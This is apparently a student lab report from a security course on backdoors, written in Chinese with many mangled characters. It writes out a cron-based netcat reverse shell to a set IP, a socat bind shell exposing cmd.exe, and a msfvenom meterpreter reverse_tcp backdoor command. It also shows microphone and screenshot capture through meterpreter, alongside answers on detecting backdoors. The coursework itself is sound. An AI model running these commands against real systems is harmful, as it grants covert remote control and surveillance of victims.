20155327Exp2 后门原理与实践

20155327Exp2 后门原理与实践

1、实验说明

任务一：使用netcat获取主机操做Shell，cron启动 (0.5分)

任务二：使用socat获取主机操做Shell, 任务计划启动 (0.5分)

任务三：使用MSF meterpreter（或其余软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

任务四：使用MSF meterpreter（或其余软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权 (2分)

2、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

多是咱们点开某个连接的时候，自动加载了某个可执行文件，就相似于执行了实验中传入到windows中的backdoor.exe；也多是咱们点开某个网页时，该网页经过木马的方式在咱们不知情的状况下自动下载了某个后门文件。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

linux中可能crontab文件被修改，周期性（定时）反向链接控制主机，只要控制主机保持侦听状态，就能够周期性启动后门，控制被控主机。
windows中多是被动下载、接收了后门程序，当被控端点击运行该程序时，后门便会启动。

(3)Meterpreter有哪些给你映像深入的功能？

可以获取被控主机的麦克风录音、获取被控主机的摄像头拍照和录像。

(4)如何发现本身有系统有没有被安装后门？

利用防火墙，在防火墙看开启的端口及对应的进程，通常不是系统默认开启的端口都是可疑的，要找一下对应的进程，找到对应进程，对相应进程进行抓包，看他通讯的数据，分析是否是后门。

按期用360管家等软件对系统进行检测，及时处理疑似病毒、木马的程序。

1. 经常使用后门工具

   任务一：Windows得到Linux Shell

一、在Windows下使用ipconfig查看本机IP：

二、使用ncat.exe程序监听本机的5303端口：

三、在Kali环境下，使用nc指令的-e选项反向链接Windows主机的5303端口：

四、成功得到Kali的shell，以下图所示：

任务二：Linux得到Windows Shell

一、在Kali环境中使用ifconfig查看IP：

二、使用nc指令监听5303端口：
三、在Windows下，使用ncat.exe程序的-e选项项反向链接Kali主机的5303端口：
四、Kali下能够看到Windows的命令提示，能够输入Windows命令：

任务三：使用nc传输数据

一、Windows下监听5303端口：

二、Kali下链接到Windows的5303端口：

三、创建链接以后，就能够传输数据了：

返回目录

1. Meterpreter
   任务一：使用netcat获取主机操做Shell，cron启动

一、在Windows系统下，监听5303端口：

二、用crontab -e指令编辑一条定时任务

三、在最后一行添加45 * * * * /bin/netcat 172.16.8.28 5303 -e /bin/sh，意思是在每一个小时的第45分钟反向链接Windows主机的5303端口：

四、当时间到了17点45时，此时已经得到了Kali的shell，能够输入指令：

任务二：使用socat获取主机操做Shell, 任务计划启动

预备知识：

实践过程：
一、在win10系统下，右击屏幕左下角windows图标，选择“计算机管理”。

在任务计划程序建立任务，填写任务名称，并新建一个触发器。

二、在操做->程序或脚本中选择你的socat.exe文件的路径，在添加参数一栏填写tcp-listen:5303 exec:cmd.exe,pty,stderr，这个命令的做用是把cmd.exe绑定到端口5303，同时把cmd.exe的stderr重定向到stdout上：

三、建立完成以后，按Windows+L快捷键锁定计算机，再次打开时，能够发现以前建立的任务已经开始运行：

四、此时，在Kali环境下输入指令socat - tcp:172.30.4.253:5303，这里的第一个参数-表明标准的输入输出，第二个流链接到Windows主机的5215端口，此时能够发现已经成功得到了一个cmd shell：

任务三：使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

一、输入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.4.253 LPORT=5303 -f exe > 20155303_backdoor.exe

生成后门程序：

二、经过nc指令将生成的后门程序传送到Windows主机上：

三、在Kali上使用msfconsole指令进入msf控制台，使用监听模块，设置payload，设置反弹回连的IP和端口：

四、设置完成后，执行监听：

五、运行Windows下的后门程序：

六、此时Kali上已经得到了Windows主机的链接，而且获得了远程控制的shell：

任务四：使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

使用record_mic指令能够截获一段音频：

使用screenshot指令能够进行截屏：